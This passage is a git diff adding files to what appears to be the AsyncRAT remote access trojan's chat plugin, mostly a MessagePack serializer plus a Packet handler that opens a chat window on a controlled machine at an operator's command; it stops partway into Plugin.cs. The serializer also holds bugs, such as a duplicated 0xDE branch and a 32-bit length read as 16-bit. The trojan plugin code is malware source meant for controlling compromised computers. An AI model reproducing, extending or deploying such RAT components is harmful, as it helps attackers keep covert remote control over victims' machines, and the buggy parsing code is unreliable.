+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Packet.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Packet.cs
new file mode 100644
index 0000000..8a08a81
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/Packet.cs
@@ -0,0 +1,86 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static FormChat GetFormChat;
+
+ public static void Read(object data)
+ {
+ try
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "chat":
+ {
+ new HandlerChat().CreateChat();
+ break;
+ }
+
+ case "chatWriteInput":
+ {
+ new HandlerChat().WriteInput(unpack_msgpack);
+ break;
+ }
+
+ case "chatExit":
+ {
+ new HandlerChat().ExitChat();
+ break;
+ }
+ }
+ }
+ catch { }
+ }
+ }
+
+ public class HandlerChat
+ {
+
+ public void CreateChat()
+ {
+ new Thread(() =>
+ {
+ Packet.GetFormChat = new FormChat();
+ Packet.GetFormChat.ShowDialog();
+ }).Start();
+ }
+ public void WriteInput(MsgPack unpack_msgpack)
+ {
+ if (Packet.GetFormChat.InvokeRequired)
+ {
+ Packet.GetFormChat.Invoke((MethodInvoker)(() =>
+ {
+ Console.Beep();
+ Packet.GetFormChat.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Input").AsString + Environment.NewLine);
+ }));
+ }
+ }
+
+ public void ExitChat()
+ {
+ if (Packet.GetFormChat.InvokeRequired)
+ {
+ Packet.GetFormChat.Invoke((MethodInvoker)(() =>
+ {
+ Packet.GetFormChat?.Close();
+ Packet.GetFormChat?.Dispose();
+ }));
+ }
+ Connection.Disconnected();
+ GC.Collect();
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs
new file mode 100644
index 0000000..9fec2d9
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
